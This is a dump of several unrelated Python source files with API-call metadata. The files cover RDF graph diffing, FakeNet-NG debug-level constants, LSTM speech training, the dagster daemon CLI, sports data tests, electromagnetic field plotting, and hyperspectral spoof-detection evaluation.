if graph1.identifier == graph2.identifier: str_bit = u"The 2 '%s' Graphs" % graph1.identifier else: str_bit = (u"Graphs '%s' and '%s'" % (graph1.identifier, graph2.identifier)) if iso1 == iso2: logger.debug(u"%s are isomorphic" % str_bit) return print(u"Differences between %s." % str_bit) in_both, in_first, in_second = compare.graph_diff(iso1, iso2) def dump_nt_sorted(g): return sorted(g.serialize(format='nt').splitlines()) sorted_first = dump_nt_sorted(in_first) sorted_second = dump_nt_sorted(in_second) import difflib diff = difflib.unified_diff( sorted_first, sorted_second, u'Original', u'Current', lineterm='' ) try: from pygments import highlight from pygments.formatters import terminal from pygments.lexers import web lexer = web.XmlLexer() formatter = terminal.TerminalFormatter() print(highlight(u'\n'.join(diff), lexer, formatter)) except ImportError: logger.info("Install pygments for colored diffs") print(u'\n'.join(diff)) except UnicodeDecodeError: print(u"Only in first", unicode(sorted_first)) print(u"Only in second", unicode(sorted_second))
[((13, 9, 13, 37), 'logging.getLogger', 'logging.getLogger', ({(13, 27, 13, 36): '"""ldtools"""'}, {}), "('ldtools')", False, 'import logging\n'), ((38, 14, 38, 37), 'logging.StreamHandler', 'logging.StreamHandler', ({}, {}), '()', False, 'import logging\n'), ((41, 13, 41, 32), 'logging.getLogger', 'logging.getLogger', ({}, {}), '()', False, 'import logging\n'), ((44, 14, 44, 56), 'logging.getLogger', 'logging.getLogger', ({(44, 32, 44, 55): '"""ldtools._add_property"""'}, {}), "('ldtools._add_property')", False, 'import logging\n'), ((77, 11, 77, 40), 'rdflib.compare.to_isomorphic', 'compare.to_isomorphic', ({(77, 33, 77, 39): 'graph1'}, {}), '(graph1)', False, 'from rdflib import compare\n'), ((78, 11, 78, 40), 'rdflib.compare.to_isomorphic', 'compare.to_isomorphic', ({(78, 33, 78, 39): 'graph2'}, {}), '(graph2)', False, 'from rdflib import compare\n'), ((92, 35, 92, 65), 'rdflib.compare.graph_diff', 'compare.graph_diff', ({(92, 54, 92, 58): 'iso1', (92, 60, 92, 64): 'iso2'}, {}), '(iso1, iso2)', False, 'from rdflib import compare\n'), ((102, 11, 108, 5), 'difflib.unified_diff', 'difflib.unified_diff', (), '', False, 'import difflib\n'), ((115, 16, 115, 30), 'pygments.lexers.web.XmlLexer', 'web.XmlLexer', ({}, {}), '()', False, 'from pygments.lexers import web\n'), ((116, 20, 116, 48), 'pygments.formatters.terminal.TerminalFormatter', 'terminal.TerminalFormatter', ({}, {}), '()', False, 'from pygments.formatters import terminal\n'), ((35, 19, 35, 57), 'logging.Formatter.format', 'logging.Formatter.format', ({(35, 44, 35, 48): 'self', (35, 50, 35, 56): 'record'}, {}), '(self, record)', False, 'import logging\n')]
AzzOnFire/flare-fakenet-ng
fakenet/diverters/debuglevels.py
bafd7e97b61cd43190dee7f1d2c3f4388488af76
# Debug print levels for fine-grained debug trace output control DNFQUEUE = (1 << 0) # netfilterqueue DGENPKT = (1 << 1) # Generic packet handling DGENPKTV = (1 << 2) # Generic packet handling with TCP analysis DCB = (1 << 3) # Packet handlign callbacks DPROCFS = (1 << 4) # procfs DIPTBLS = (1 << 5) # iptables DNONLOC = (1 << 6) # Nonlocal-destined datagrams DDPF = (1 << 7) # DPF (Dynamic Port Forwarding) DDPFV = (1 << 8) # DPF (Dynamic Port Forwarding) Verbose DIPNAT = (1 << 9) # IP redirection for nonlocal-destined datagrams DMANGLE = (1 << 10) # Packet mangling DPCAP = (1 << 11) # Pcap write logic DIGN = (1 << 12) # Packet redirect ignore conditions DFTP = (1 << 13) # FTP checks DMISC = (1 << 27) # Miscellaneous DCOMP = 0x0fffffff # Component mask DFLAG = 0xf0000000 # Flag mask DEVERY = 0x0fffffff # Log everything, low verbosity DEVERY2 = 0x8fffffff # Log everything, complete verbosity DLABELS = { DNFQUEUE: 'NFQUEUE', DGENPKT: 'GENPKT', DGENPKTV: 'GENPKTV', DCB: 'CB', DPROCFS: 'PROCFS', DIPTBLS: 'IPTABLES', DNONLOC: 'NONLOC', DDPF: 'DPF', DDPFV: 'DPFV', DIPNAT: 'IPNAT', DMANGLE: 'MANGLE', DPCAP: 'PCAP', DIGN: 'IGN', DFTP: 'FTP', DIGN | DFTP: 'IGN-FTP', DMISC: 'MISC', } DLABELS_INV = {v.upper(): k for k, v in DLABELS.items()}
[]
zhr1201/Multi-channel-speech-extraction-using-DNN
multichannel_lstm/train.py
4e48869e02b815a8b094acc9251ac6586fda350c
''' Script for training the model ''' import tensorflow as tf import numpy as np from input import BatchGenerator from model import MultiRnn import time from datetime import datetime import os import matplotlib as mpl mpl.use('Agg') from matplotlib import pyplot as plt sum_dir = 'sum' # dir to write summary train_dir = 'ckpt' # dir to store the model data_dir = 'train.pkl' # dir of the data set NEFF = 129 # effective FFT points batch_size = 128 num_steps = 20 epochs = 2000 cell_type = 'NL_LSTM' state_size = 256 output_size = 129 num_layer = 3 learning_rate = 0.0001 # build the model rnn_model = MultiRnn( cell_type, state_size, output_size, batch_size, num_layer, learning_rate, num_steps) # input data and referene data placeholder in_data = tf.placeholder( tf.float32, [batch_size, num_steps, 2 * NEFF]) ref_data = tf.placeholder( tf.float32, [batch_size, num_steps, NEFF]) # make inference init_state, final_state, inf_data = rnn_model.inference(in_data) # compute loss loss = rnn_model.loss(inf_data, ref_data) saver = tf.train.Saver(tf.all_variables()) summary_op = tf.merge_all_summaries() train_op = rnn_model.train(loss) batch_gen = BatchGenerator(data_dir, batch_size, num_steps, epochs) with tf.Session() as sess: summary_writer = tf.train.SummaryWriter( sum_dir, sess.graph) sess.run(tf.initialize_all_variables()) steps = 0 # generator for epoch data for idx, epoch in enumerate(batch_gen.gen_epochs()): training_state = None # generator for batch data for f_data, b_data, r_data, v_data in epoch: start_time = time.time() steps += 1 in_data_np = np.concatenate((f_data, b_data), axis=2) if steps % 100 == 0: feed_dict = {in_data: in_data_np, ref_data: r_data} if training_state is not None: feed_dict[init_state] = training_state # training the net loss_value, training_state, _, summary_str, test_inf = sess.run( [loss, final_state, train_op, summary_op, inf_data], feed_dict) duration = time.time() - start_time sec_per_batch = float(duration) examples_per_sec = batch_size / duration format_str = ( '%s: step %d, loss = %.2f (%.1f examples/sec; %.3f ' 'sec/batch, epoch %d)') print (format_str % (datetime.now(), steps, loss_value, examples_per_sec, sec_per_batch, idx)) summary_writer.add_summary(summary_str, steps) else: feed_dict = {in_data: in_data_np, ref_data: r_data} if training_state is not None: feed_dict[init_state] = training_state loss_value, training_state, _ = sess.run( [loss, final_state, train_op], feed_dict) if steps % 10000 == 0: checkpoint_path = os.path.join(train_dir, 'model.ckpt') saver.save(sess, checkpoint_path, global_step=steps)
[((12, 0, 12, 14), 'matplotlib.use', 'mpl.use', ({(12, 8, 12, 13): '"""Agg"""'}, {}), "('Agg')", True, 'import matplotlib as mpl\n'), ((30, 12, 32, 52), 'model.MultiRnn', 'MultiRnn', ({(31, 4, 31, 13): 'cell_type', (31, 15, 31, 25): 'state_size', (31, 27, 31, 38): 'output_size', (32, 4, 32, 14): 'batch_size', (32, 16, 32, 25): 'num_layer', (32, 27, 32, 40): 'learning_rate', (32, 42, 32, 51): 'num_steps'}, {}), '(cell_type, state_size, output_size, batch_size, num_layer,\n learning_rate, num_steps)', False, 'from model import MultiRnn\n'), ((35, 10, 36, 50), 'tensorflow.placeholder', 'tf.placeholder', ({(36, 4, 36, 14): 'tf.float32', (36, 16, 36, 49): '[batch_size, num_steps, 2 * NEFF]'}, {}), '(tf.float32, [batch_size, num_steps, 2 * NEFF])', True, 'import tensorflow as tf\n'), ((37, 11, 38, 46), 'tensorflow.placeholder', 'tf.placeholder', ({(38, 4, 38, 14): 'tf.float32', (38, 16, 38, 45): '[batch_size, num_steps, NEFF]'}, {}), '(tf.float32, [batch_size, num_steps, NEFF])', True, 'import tensorflow as tf\n'), ((48, 13, 48, 37), 'tensorflow.merge_all_summaries', 'tf.merge_all_summaries', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((52, 12, 52, 67), 'input.BatchGenerator', 'BatchGenerator', ({(52, 27, 52, 35): 'data_dir', (52, 37, 52, 47): 'batch_size', (52, 49, 52, 58): 'num_steps', (52, 60, 52, 66): 'epochs'}, {}), '(data_dir, batch_size, num_steps, epochs)', False, 'from input import BatchGenerator\n'), ((46, 23, 46, 41), 'tensorflow.all_variables', 'tf.all_variables', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((54, 5, 54, 17), 'tensorflow.Session', 'tf.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((55, 21, 56, 28), 'tensorflow.train.SummaryWriter', 'tf.train.SummaryWriter', ({(56, 8, 56, 15): 'sum_dir', (56, 17, 56, 27): 'sess.graph'}, {}), '(sum_dir, sess.graph)', True, 'import tensorflow as tf\n'), ((57, 13, 57, 42), 'tensorflow.initialize_all_variables', 'tf.initialize_all_variables', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((64, 25, 64, 36), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((66, 25, 66, 65), 'numpy.concatenate', 'np.concatenate', (), '', True, 'import numpy as np\n'), ((92, 34, 92, 71), 'os.path.join', 'os.path.join', ({(92, 47, 92, 56): 'train_dir', (92, 58, 92, 70): '"""model.ckpt"""'}, {}), "(train_dir, 'model.ckpt')", False, 'import os\n'), ((74, 27, 74, 38), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((80, 37, 80, 51), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime\n')]
elsenorbw/dagster
python_modules/dagster/dagster/daemon/cli/__init__.py
b38822d7463812624dab0b2dae7c62e2a8d59828
import os import sys import threading import time import warnings from contextlib import ExitStack import click import pendulum from dagster import __version__ from dagster.core.instance import DagsterInstance from dagster.daemon.controller import ( DEFAULT_DAEMON_HEARTBEAT_TOLERANCE_SECONDS, DagsterDaemonController, all_daemons_healthy, all_daemons_live, daemon_controller_from_instance, debug_daemon_heartbeats, get_daemon_status, ) from dagster.utils.interrupts import capture_interrupts, raise_interrupts_as def _get_heartbeat_tolerance(): tolerance = os.getenv( "DAGSTER_DAEMON_HEARTBEAT_TOLERANCE", ) return int(tolerance) if tolerance else DEFAULT_DAEMON_HEARTBEAT_TOLERANCE_SECONDS @click.command( name="run", help="Run any daemons configured on the DagsterInstance.", ) def run_command(): with capture_interrupts(): with DagsterInstance.get() as instance: if instance.is_ephemeral: raise Exception( "dagster-daemon can't run using an in-memory instance. Make sure " "the DAGSTER_HOME environment variable has been set correctly and that " "you have created a dagster.yaml file there." ) with daemon_controller_from_instance( instance, heartbeat_tolerance_seconds=_get_heartbeat_tolerance() ) as controller: controller.check_daemon_loop() @click.command( name="health-check", help="DEPRECATED, use liveness-check instead", ) def health_check_command(): warnings.warn("health-check is deprecated. Use liveness-check instead.") with DagsterInstance.get() as instance: if all_daemons_healthy(instance, heartbeat_tolerance_seconds=_get_heartbeat_tolerance()): click.echo("Daemon healthy") else: click.echo("Daemon not healthy") sys.exit(1) @click.command( name="liveness-check", help="Check for recent heartbeats from the daemon.", ) @click.option( "--heartbeat-tolerance", required=False, default=DEFAULT_DAEMON_HEARTBEAT_TOLERANCE_SECONDS, help="How long (in seconds) to allow a daemon to go without heartbeating before failing the dagster-daemon process.", ) def liveness_check_command(): with DagsterInstance.get() as instance: if all_daemons_live(instance, heartbeat_tolerance_seconds=_get_heartbeat_tolerance()): click.echo("Daemon live") else: click.echo("Daemon(s) not running") sys.exit(1) @click.command( name="wipe", help="Wipe all heartbeats from storage.", ) def wipe_command(): with DagsterInstance.get() as instance: instance.wipe_daemon_heartbeats() click.echo("Daemon heartbeats wiped") @click.command( name="heartbeat", help="Read and write a heartbeat", ) def debug_heartbeat_command(): with DagsterInstance.get() as instance: debug_daemon_heartbeats(instance) @click.command( name="heartbeat-dump", help="Log all heartbeat statuses", ) def debug_heartbeat_dump_command(): with DagsterInstance.get() as instance: for daemon_type in instance.get_required_daemon_types(): click.echo(get_daemon_status(instance, daemon_type)) @click.group( commands={"heartbeat": debug_heartbeat_command, "heartbeat-dump": debug_heartbeat_dump_command} ) def debug_group(): "Daemon debugging utils" def create_dagster_daemon_cli(): commands = { "run": run_command, "health-check": health_check_command, "liveness-check": liveness_check_command, "wipe": wipe_command, "debug": debug_group, } @click.group(commands=commands) @click.version_option(version=__version__) def group(): "CLI tools for working with the dagster daemon process." return group cli = create_dagster_daemon_cli() def main(): cli(obj={}) # pylint:disable=E1123
[((31, 1, 34, 1), 'click.command', 'click.command', (), '', False, 'import click\n'), ((51, 1, 54, 1), 'click.command', 'click.command', (), '', False, 'import click\n'), ((65, 1, 68, 1), 'click.command', 'click.command', (), '', False, 'import click\n'), ((69, 1, 74, 1), 'click.option', 'click.option', (), '', False, 'import click\n'), ((84, 1, 87, 1), 'click.command', 'click.command', (), '', False, 'import click\n'), ((94, 1, 97, 1), 'click.command', 'click.command', (), '', False, 'import click\n'), ((103, 1, 106, 1), 'click.command', 'click.command', (), '', False, 'import click\n'), ((113, 1, 115, 1), 'click.group', 'click.group', (), '', False, 'import click\n'), ((25, 16, 27, 5), 'os.getenv', 'os.getenv', ({(26, 8, 26, 44): '"""DAGSTER_DAEMON_HEARTBEAT_TOLERANCE"""'}, {}), "('DAGSTER_DAEMON_HEARTBEAT_TOLERANCE')", False, 'import os\n'), ((56, 4, 56, 76), 'warnings.warn', 'warnings.warn', ({(56, 18, 56, 75): '"""health-check is deprecated. Use liveness-check instead."""'}, {}), "('health-check is deprecated. Use liveness-check instead.')", False, 'import warnings\n'), ((129, 5, 129, 35), 'click.group', 'click.group', (), '', False, 'import click\n'), ((130, 5, 130, 46), 'click.version_option', 'click.version_option', (), '', False, 'import click\n'), ((36, 9, 36, 29), 'dagster.utils.interrupts.capture_interrupts', 'capture_interrupts', ({}, {}), '()', False, 'from dagster.utils.interrupts import capture_interrupts, raise_interrupts_as\n'), ((57, 9, 57, 30), 'dagster.core.instance.DagsterInstance.get', 'DagsterInstance.get', ({}, {}), '()', False, 'from dagster.core.instance import DagsterInstance\n'), ((76, 9, 76, 30), 'dagster.core.instance.DagsterInstance.get', 'DagsterInstance.get', ({}, {}), '()', False, 'from dagster.core.instance import DagsterInstance\n'), ((89, 9, 89, 30), 'dagster.core.instance.DagsterInstance.get', 'DagsterInstance.get', ({}, {}), '()', False, 'from dagster.core.instance import DagsterInstance\n'), ((91, 8, 91, 45), 'click.echo', 'click.echo', ({(91, 19, 91, 44): '"""Daemon heartbeats wiped"""'}, {}), "('Daemon heartbeats wiped')", False, 'import click\n'), ((99, 9, 99, 30), 'dagster.core.instance.DagsterInstance.get', 'DagsterInstance.get', ({}, {}), '()', False, 'from dagster.core.instance import DagsterInstance\n'), ((100, 8, 100, 41), 'dagster.daemon.controller.debug_daemon_heartbeats', 'debug_daemon_heartbeats', ({(100, 32, 100, 40): 'instance'}, {}), '(instance)', False, 'from dagster.daemon.controller import DEFAULT_DAEMON_HEARTBEAT_TOLERANCE_SECONDS, DagsterDaemonController, all_daemons_healthy, all_daemons_live, daemon_controller_from_instance, debug_daemon_heartbeats, get_daemon_status\n'), ((108, 9, 108, 30), 'dagster.core.instance.DagsterInstance.get', 'DagsterInstance.get', ({}, {}), '()', False, 'from dagster.core.instance import DagsterInstance\n'), ((37, 13, 37, 34), 'dagster.core.instance.DagsterInstance.get', 'DagsterInstance.get', ({}, {}), '()', False, 'from dagster.core.instance import DagsterInstance\n'), ((59, 12, 59, 40), 'click.echo', 'click.echo', ({(59, 23, 59, 39): '"""Daemon healthy"""'}, {}), "('Daemon healthy')", False, 'import click\n'), ((61, 12, 61, 44), 'click.echo', 'click.echo', ({(61, 23, 61, 43): '"""Daemon not healthy"""'}, {}), "('Daemon not healthy')", False, 'import click\n'), ((62, 12, 62, 23), 'sys.exit', 'sys.exit', ({(62, 21, 62, 22): '(1)'}, {}), '(1)', False, 'import sys\n'), ((78, 12, 78, 37), 'click.echo', 'click.echo', ({(78, 23, 78, 36): '"""Daemon live"""'}, {}), "('Daemon live')", False, 'import click\n'), ((80, 12, 80, 47), 'click.echo', 'click.echo', ({(80, 23, 80, 46): '"""Daemon(s) not running"""'}, {}), "('Daemon(s) not running')", False, 'import click\n'), ((81, 12, 81, 23), 'sys.exit', 'sys.exit', ({(81, 21, 81, 22): '(1)'}, {}), '(1)', False, 'import sys\n'), ((110, 23, 110, 63), 'dagster.daemon.controller.get_daemon_status', 'get_daemon_status', ({(110, 41, 110, 49): 'instance', (110, 51, 110, 62): 'daemon_type'}, {}), '(instance, daemon_type)', False, 'from dagster.daemon.controller import DEFAULT_DAEMON_HEARTBEAT_TOLERANCE_SECONDS, DagsterDaemonController, all_daemons_healthy, all_daemons_live, daemon_controller_from_instance, debug_daemon_heartbeats, get_daemon_status\n')]
atklaus/sportsreference
tests/exhaustive/nfl_tests.py
22a45ea83ce1608c3176f00d4f414d5b9463605c
import sys, os sys.path.append(os.path.dirname(os.path.dirname(sys.path[0]))) from sportsreference.nfl.teams import Teams for team in Teams(): print(team.name) for player in team.roster.players: print(player.name) for game in team.schedule: print(game.dataframe) print(game.dataframe_extended)
[((5, 12, 5, 19), 'sportsreference.nfl.teams.Teams', 'Teams', ({}, {}), '()', False, 'from sportsreference.nfl.teams import Teams\n'), ((2, 32, 2, 60), 'os.path.dirname', 'os.path.dirname', ({(2, 48, 2, 59): 'sys.path[0]'}, {}), '(sys.path[0])', False, 'import sys, os\n')]
SerebryakovMA/quelea
rust-old/python/examples/map_fields.py
4bac70d60852a454ad6533d08a02e018c75dc377
import numpy as np import matplotlib import matplotlib.pyplot as plt import sys sys.path.append("../") from quelea import * nx = 217 ny = 133 x0 = 0 x1 = 30 # lambdas y0 = 0 y1 = 20 # lambdas xs = np.linspace(x0, x1, nx) ys = np.linspace(y0, y1, ny) # 2d array of (x, y, z, t) coords = np.array( [ [x, y, 0, 0] for x in xs for y in ys ] ) # for map_fields function this should be converted from 2D to 1D array coords = coords.reshape((4 * nx * ny,)) ftype = 1 # plane wave a0 = 1 # normalized field amplitude omega = 1 # frequency fparam = [a0, 1, 0, 0, 0, 1, 0, 0, omega] # parameters of the plane wave ex, ey, ez, bx, by, bz = map_fields(coords, ftype, fparam) # now convert to 2d arrays ex = ex.reshape((nx, ny)) ey = ey.reshape((nx, ny)) ez = ez.reshape((nx, ny)) bx = bx.reshape((nx, ny)) by = by.reshape((nx, ny)) bz = bz.reshape((nx, ny)) ex = ex.transpose() ey = ey.transpose() ez = ez.transpose() bx = bx.transpose() by = by.transpose() bz = bz.transpose() plt.imshow(ey, cmap = 'RdYlBu', origin = 'lower', extent = [x0, x1, y0, y1]) plt.colorbar() plt.clim(-a0, a0) plt.savefig("map_fields.pdf")
[((6, 0, 6, 22), 'sys.path.append', 'sys.path.append', ({(6, 16, 6, 21): '"""../"""'}, {}), "('../')", False, 'import sys\n'), ((17, 5, 17, 28), 'numpy.linspace', 'np.linspace', ({(17, 17, 17, 19): 'x0', (17, 21, 17, 23): 'x1', (17, 25, 17, 27): 'nx'}, {}), '(x0, x1, nx)', True, 'import numpy as np\n'), ((18, 5, 18, 28), 'numpy.linspace', 'np.linspace', ({(18, 17, 18, 19): 'y0', (18, 21, 18, 23): 'y1', (18, 25, 18, 27): 'ny'}, {}), '(y0, y1, ny)', True, 'import numpy as np\n'), ((21, 9, 21, 61), 'numpy.array', 'np.array', ({(21, 19, 21, 59): '[[x, y, 0, 0] for x in xs for y in ys]'}, {}), '([[x, y, 0, 0] for x in xs for y in ys])', True, 'import numpy as np\n'), ((45, 0, 45, 76), 'matplotlib.pyplot.imshow', 'plt.imshow', (), '', True, 'import matplotlib.pyplot as plt\n'), ((46, 0, 46, 14), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((47, 0, 47, 17), 'matplotlib.pyplot.clim', 'plt.clim', ({(47, 9, 47, 12): '(-a0)', (47, 14, 47, 16): 'a0'}, {}), '(-a0, a0)', True, 'import matplotlib.pyplot as plt\n'), ((49, 0, 49, 29), 'matplotlib.pyplot.savefig', 'plt.savefig', ({(49, 12, 49, 28): '"""map_fields.pdf"""'}, {}), "('map_fields.pdf')", True, 'import matplotlib.pyplot as plt\n')]
t-kaichi/hyperspoof
test.py
6effdf03be8489ba74154a12416c69948681aa51
import os from absl import app from absl import flags import numpy as np import tqdm from tensorflow.keras import Model from albumentations import ( Compose, HorizontalFlip, RandomBrightness,RandomContrast, ShiftScaleRotate, ToFloat, VerticalFlip) from utils import reset_tf from eval_utils import calc_score_variance from models import build_seg_model, build_pixel_mlp_class_model from VegetableSequence import VegetableDataset, VegetableSequence from temporal_random_seed import TemporalRandomSeed import myFlags FLAGS = flags.FLAGS def main(argv): reset_tf(FLAGS.device) ds_info = VegetableDataset(FLAGS.data_path) dim = ds_info.hsi_dims cats = ds_info.get_categories() # spoof file path assert FLAGS.spoof_type == "print" or FLAGS.spoof_type == "replay" spooffn = "224_224.m.rf.npy" spoofdir = '03' if FLAGS.spoof_type == 'print' else '04' # "04": replay spooffns = [os.path.join(ds_info.DATASET_ROOT_PATH, str(i).zfill(2), "05", spoofdir, spooffn) for i in cats] # dataset generation input_shape = (224, 224, dim) AUGMENTATIONS_ALL = Compose([ HorizontalFlip(p=0.5), VerticalFlip(p=0.2), RandomContrast(limit=0.001, p=0.5), RandomBrightness(limit=0.001, p=0.5), ShiftScaleRotate( shift_limit=0.3, scale_limit=0.9, rotate_limit=30, border_mode=4, p=0.8),# cv2.BORDER_REFLECT_101 ToFloat(max_value=1024) ]) AUGMENTATIONS_SIMPLE = Compose([ ToFloat(max_value=1024) ]) test_aug_gen = VegetableSequence(dataset=ds_info, instance_ids=[5], sample_ids=[1,2], random_state=2, batch_size=32, augmentations=AUGMENTATIONS_ALL, isTest=True) # build and load models print("building model") nb_classes = ds_info.object_categories seg_model = build_seg_model(input_shape=input_shape) seg_model.load_weights(FLAGS.seg_model) pix_class_model = build_pixel_mlp_class_model( nb_classes=nb_classes, input_shape=(1,dim)) pix_class_model.load_weights(FLAGS.class_model) penultimate_feat_extractor = Model(inputs=pix_class_model.input, outputs=pix_class_model.get_layer("penultimate").output) def predict_pixel_merge(xs): _xs_seg = np.argmax(seg_model.predict(xs), axis=-1) assert len(_xs_seg) == len(xs) _var_fs = [] # variance of the penultimate features for i in range(len(xs)): _x = xs[i] _x_seg = _xs_seg[i] _x_pixels = _x[_x_seg > 0] _x_pixels = _x_pixels[:, np.newaxis, :] _f_pixels = penultimate_feat_extractor.predict(_x_pixels, batch_size=224*224*dim).reshape(-1, FLAGS.penultimate_nodes) _var_f = np.sum(np.var(_f_pixels, axis=0)) _var_fs.append(_var_f) return _var_fs predict_func = predict_pixel_merge var_fs = [] true_labels = [] # process live images for i in tqdm.trange(FLAGS.live_augs, desc="live augumentations"): for batch in tqdm.tqdm(test_aug_gen, desc="live augumentations batch"): xs, ys = batch var_f = predict_func(xs) var_fs.extend(var_f) true_labels.extend(np.argmax(ys, axis=1)) # process spoof images with TemporalRandomSeed(2021): for fn in tqdm.tqdm(spooffns, desc="spoofs"): x = np.load(fn).astype("uint16") xs_aug = np.array([AUGMENTATIONS_ALL(image=x)["image"] for i in range(FLAGS.spoof_augs)]) var_f = predict_func(xs_aug) var_fs.extend(var_f) true_labels.extend([10000] * FLAGS.spoof_augs) # spoof label: 10000 # calculate accuracy true_labels = np.array(true_labels) var_fs = np.array(var_fs) bin_labels, uncertainties, results = calc_score_variance(true_labels, var_fs) # save results expr_name = parentdirname(FLAGS.class_model) save_result_cache(expr_name, bin_labels, uncertainties, results) return 0 def save_result_cache(expr_name, labels, uncertainties, results): dn = os.path.join(FLAGS.out_path, expr_name) os.makedirs(dn, exist_ok=True) np.save(os.path.join(dn, "binary_labels.npy"), labels) np.save(os.path.join(dn, "uncertainties.npy"), uncertainties) with open(os.path.join(dn, "results.txt"), "w") as f: for i, result in enumerate(["TNR95: ", "Detection acc.: ", "ROC: "]): f.write(result + str(results[i]) + "\n") print("saved to " + dn) def parentdirname(path): return os.path.basename(os.path.dirname(path)) if __name__ == "__main__": app.run(main)
[((21, 4, 21, 26), 'utils.reset_tf', 'reset_tf', ({(21, 13, 21, 25): 'FLAGS.device'}, {}), '(FLAGS.device)', False, 'from utils import reset_tf\n'), ((22, 14, 22, 47), 'VegetableSequence.VegetableDataset', 'VegetableDataset', ({(22, 31, 22, 46): 'FLAGS.data_path'}, {}), '(FLAGS.data_path)', False, 'from VegetableSequence import VegetableDataset, VegetableSequence\n'), ((48, 19, 50, 69), 'VegetableSequence.VegetableSequence', 'VegetableSequence', (), '', False, 'from VegetableSequence import VegetableDataset, VegetableSequence\n'), ((55, 16, 55, 56), 'models.build_seg_model', 'build_seg_model', (), '', False, 'from models import build_seg_model, build_pixel_mlp_class_model\n'), ((58, 22, 59, 59), 'models.build_pixel_mlp_class_model', 'build_pixel_mlp_class_model', (), '', False, 'from models import build_seg_model, build_pixel_mlp_class_model\n'), ((87, 13, 87, 69), 'tqdm.trange', 'tqdm.trange', (), '', False, 'import tqdm\n'), ((105, 18, 105, 39), 'numpy.array', 'np.array', ({(105, 27, 105, 38): 'true_labels'}, {}), '(true_labels)', True, 'import numpy as np\n'), ((107, 13, 107, 29), 'numpy.array', 'np.array', ({(107, 22, 107, 28): 'var_fs'}, {}), '(var_fs)', True, 'import numpy as np\n'), ((108, 41, 108, 81), 'eval_utils.calc_score_variance', 'calc_score_variance', ({(108, 61, 108, 72): 'true_labels', (108, 74, 108, 80): 'var_fs'}, {}), '(true_labels, var_fs)', False, 'from eval_utils import calc_score_variance\n'), ((116, 9, 116, 48), 'os.path.join', 'os.path.join', ({(116, 22, 116, 36): 'FLAGS.out_path', (116, 38, 116, 47): 'expr_name'}, {}), '(FLAGS.out_path, expr_name)', False, 'import os\n'), ((117, 4, 117, 34), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((129, 4, 129, 17), 'absl.app.run', 'app.run', ({(129, 12, 129, 16): 'main'}, {}), '(main)', False, 'from absl import app\n'), ((88, 21, 88, 78), 'tqdm.tqdm', 'tqdm.tqdm', (), '', False, 'import tqdm\n'), ((95, 9, 95, 33), 'temporal_random_seed.TemporalRandomSeed', 'TemporalRandomSeed', ({(95, 28, 95, 32): '(2021)'}, {}), '(2021)', False, 'from temporal_random_seed import TemporalRandomSeed\n'), ((96, 18, 96, 52), 'tqdm.tqdm', 'tqdm.tqdm', (), '', False, 'import tqdm\n'), ((118, 12, 118, 49), 'os.path.join', 'os.path.join', ({(118, 25, 118, 27): 'dn', (118, 29, 118, 48): '"""binary_labels.npy"""'}, {}), "(dn, 'binary_labels.npy')", False, 'import os\n'), ((119, 12, 119, 49), 'os.path.join', 'os.path.join', ({(119, 25, 119, 27): 'dn', (119, 29, 119, 48): '"""uncertainties.npy"""'}, {}), "(dn, 'uncertainties.npy')", False, 'import os\n'), ((126, 28, 126, 49), 'os.path.dirname', 'os.path.dirname', ({(126, 44, 126, 48): 'path'}, {}), '(path)', False, 'import os\n'), ((36, 8, 36, 29), 'albumentations.HorizontalFlip', 'HorizontalFlip', (), '', False, 'from albumentations import Compose, HorizontalFlip, RandomBrightness, RandomContrast, ShiftScaleRotate, ToFloat, VerticalFlip\n'), ((37, 8, 37, 27), 'albumentations.VerticalFlip', 'VerticalFlip', (), '', False, 'from albumentations import Compose, HorizontalFlip, RandomBrightness, RandomContrast, ShiftScaleRotate, ToFloat, VerticalFlip\n'), ((38, 8, 38, 42), 'albumentations.RandomContrast', 'RandomContrast', (), '', False, 'from albumentations import Compose, HorizontalFlip, RandomBrightness, RandomContrast, ShiftScaleRotate, ToFloat, VerticalFlip\n'), ((39, 8, 39, 44), 'albumentations.RandomBrightness', 'RandomBrightness', (), '', False, 'from albumentations import Compose, HorizontalFlip, RandomBrightness, RandomContrast, ShiftScaleRotate, ToFloat, VerticalFlip\n'), ((40, 8, 42, 50), 'albumentations.ShiftScaleRotate', 'ShiftScaleRotate', (), '', False, 'from albumentations import Compose, HorizontalFlip, RandomBrightness, RandomContrast, ShiftScaleRotate, ToFloat, VerticalFlip\n'), ((43, 8, 43, 31), 'albumentations.ToFloat', 'ToFloat', (), '', False, 'from albumentations import Compose, HorizontalFlip, RandomBrightness, RandomContrast, ShiftScaleRotate, ToFloat, VerticalFlip\n'), ((46, 8, 46, 31), 'albumentations.ToFloat', 'ToFloat', (), '', False, 'from albumentations import Compose, HorizontalFlip, RandomBrightness, RandomContrast, ShiftScaleRotate, ToFloat, VerticalFlip\n'), ((120, 14, 120, 45), 'os.path.join', 'os.path.join', ({(120, 27, 120, 29): 'dn', (120, 31, 120, 44): '"""results.txt"""'}, {}), "(dn, 'results.txt')", False, 'import os\n'), ((78, 28, 78, 53), 'numpy.var', 'np.var', (), '', True, 'import numpy as np\n'), ((92, 31, 92, 52), 'numpy.argmax', 'np.argmax', (), '', True, 'import numpy as np\n'), ((97, 16, 97, 27), 'numpy.load', 'np.load', ({(97, 24, 97, 26): 'fn'}, {}), '(fn)', True, 'import numpy as np\n')]
TheJacksonLaboratory/jaxid_generator
generator/apps.py
be5222d9c5ce57a169b94b0afd1ae9f7f10a66c1
